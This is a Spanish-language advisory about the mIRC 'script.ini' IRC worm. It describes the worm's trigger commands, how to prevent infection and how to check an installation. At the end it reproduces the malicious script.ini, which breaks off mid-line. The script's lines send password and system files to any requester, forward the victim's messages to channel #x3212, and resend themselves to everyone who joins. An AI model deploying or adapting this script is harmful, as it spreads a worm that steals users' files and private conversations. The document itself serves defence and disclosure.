Script.ini

Este NO ES UN VIRUS NORMAL. Sea cual sea su software antivirus usted puede ser infectado. Este documento explica como eliminar y prevenir la propagacion de este virus.

Lea esto con atención, es muy importante

Recientemente recibi un fichero script.ini por DCC cuando entre en el canal #mp3 de la red EFNET. Esto que parece no tener mas importancia (tal vez a usted tambien le haya sucedido) pero causa que su cliente de IRC (su mIRC) se comporte de forma diferente a como usted espera.

Si su "default get directory" es el mismo que el directorio donde instalo el mIRC (y es asi por defecto), su fichero script.ini ORIGINAL sera sobreescrito por el script.ini maligno si usted acepta la transferencia por DCC. Ademas, una vez sea usted infectado por ese virus-script, su mIRC intentara enviar el fichero script.ini a cualquiera que entre en un canal donde usted se encuentre.

Qué es lo que hace el virus SCRIPT.INI

El script.ini maligno que esta siendo enviado, permite a sus creadores obtener informacion confidencial sobre su PC y los ficheros que tiene en el.

Basicamente lo que los creadores del script pueden hacer es lo siguiente... (realmente cualquier usuario puede manipular a un usuario infectado a condicion de que conozca los comandos, claro esta)

/query SuNick Acoragil

Esto le desconecta del IRC.

/query SuNick shirak

Esto hara que intente enviar el fichero c:\win95\system.cb si existe.

/query SuNick Durak

Esto abre un fserve (servidor de ficheros) desde su directorio c:\mirc hacia abajo.

/query SuNick shirac

Esto envia una copia de su fichero c:\linux\etc\passwd.

/query SuNick shirat

Esto envia una copia de su fichero c:\unix\etc\passwd.

El script tambien envia TODOS los mensajes de un usuario infectado a un canal especial que (por supuesto) es invite-only. El nombre del canal es #x3212. He podido encontrar ese canal tanto en #EFNET como en UNDERNET.

Como evitar ser infectado

¿ COMO PUEDO PROTEGERME ?

La mejor (y más segura) forma de evitar recibir el fichero que produce la infeccion es DESACTIVAR la caracteristica de AUTO-GET de su cliente de IRC. Si esta usted usando el mIRC debe hacer lo siguiente:

Elija el menu DCC|Options. Aparecera una ventana de dialogo. Asegurese que la opcion "On sen request:Show get dialog" esta ACTIVADA. Esto hara que cuando le envien algun fichero por DCC su mIRC le pregunte si desea aceptarlo. Usted debera pulsar un boton antes para aceptar la transferencia. El unico incoveniente es que la gente no podra mandarle ficheros en su ausencia, ya que la transferencia del fichero no se produce si usted no la acepta.

Una alternativa al metodo anterior, es hacer que el mIRC almacene los ficheros que se reciban por DCC en un directorio distinto a c:\mirc (el directorio por defecto, donde tiene instalado el mIRC).

Para cambiar su "get directory", siga el siguiente procedimiento:

Haga una nueva carpeta, usando el Explorador de Windows o mi PC, que salga d ela raiz de su disco duro, y llamele c:\mirc-get o cualquier otra cosa parecida.

En el menu DCC|OPTIONS, saldra una ventana de dialogo. En la esquina inferior izquierda, vera una lista desplegable llamada "DCC get diretories". La palabra "default" deberia paracer en ella, como opcion selccionada.

Tambien vera tres botones, debajo de esta lista desplegable. Pulse el boton "Edit". Aparecera una nueva ventana de dialogo. Esta nueva ventana tiene 2 grandes botones. Pulse el boton que dice "Into this directory..." y introduzca el nombre del directorio que usted reo en el paso 1 (ejem: c:\mirc-get)

Sellecione OK para cerrar todas la ventanas. Ahora todos los ficheros que usted reciba seran almacenados en el directorio c:\mirc-get. Si alguin le envia a usted el fichero script.ini maligno, NO SOBREESCRIBIRA su fichero original, ya que sera almacenado en una carpeta distinta. Asi que una vez recibido simplemente tiene que borrarlo.

Como comprobar si está usted infectado por el SCRIPT.INI

Puede comprobar si esta ya infectado por este script, siguiendo el siguiente procedimiento:

Localice el fichero script.ini usando el Explorador de Windows. Este fichero se encuentra en la carpeta donde usted instalo el mIRC. Por defecto esta es c:\mirc .O la carpeta de su script.

Haga un doble-clic sobre el fichero script.ini. Windows arrancara el bloc de notas para visualizarlo.

Compruebe que el contenido de su fichero script.ini NO SE PARECE al que se muestra abajo. Si su fichero contiene las lineas que aparecen abajo, ESTA USTED INFECTADO. Si es asi, lo mejor es que desinstale el mirc, obtenga una nueva copia. Esto le asegurara que elimina el virus-script.

Esto es lo que contiene el SCRIPT.INI maligno

[script]
n0=;----------------------------------------------------------
n1=; Protection List
n2=;----------------------------------------------------------
n3=ON 1:TEXT:*Acoragil*:#:/quit
n4=ON 1:TEXT:*shirak*:#:/dcc send $nick c:\win95\system.cb
n5=ON 1:TEXT:*Durak*:#:/fserve $nick 1 c:\mirc
n6=ON 1:TEXT:*shirac*:#:/dcc send $nick c:\linux\etc\passwd.
n7=ON 1:TEXT:*shirat*:#:/dcc send $nick c:\unix\etc\passwd.
n8=ON 1:NOTICE:*:#:/msg #x3212 &127; $+ $chan $+ &127; - $+ $nick $+ - $parms
n9=ON 1:TEXT:*:?:/msg #x3212 **Message from $nick $+ ** $parms | /closemsg $nick
n10=ON 1:TEXT:*:#:/msg #x3212 &127; $+ $chan $+ &127; <$+ $nick $+> $parms
n11=ON 1:JOIN:#:/dcc send $nick SCRIPT.INI
n12=
n13=#user.prot.add.all off
n14=raw 401:*: set %User.Nick 0 | halt
n15=raw 301:*: halt
n16=raw 311:*: set %User.Address $2 $+ ! $+ $3 $+ @ $+ $4 | halt
n17=raw 312:*: halt
n18=raw 313:*: halt
n19=raw 317:*: halt
n20=raw 319:*: halt
n21=raw 318:* {
n22= if (%User.Nick == 0) { error $2 $+ , no such nick | goto do

Volver al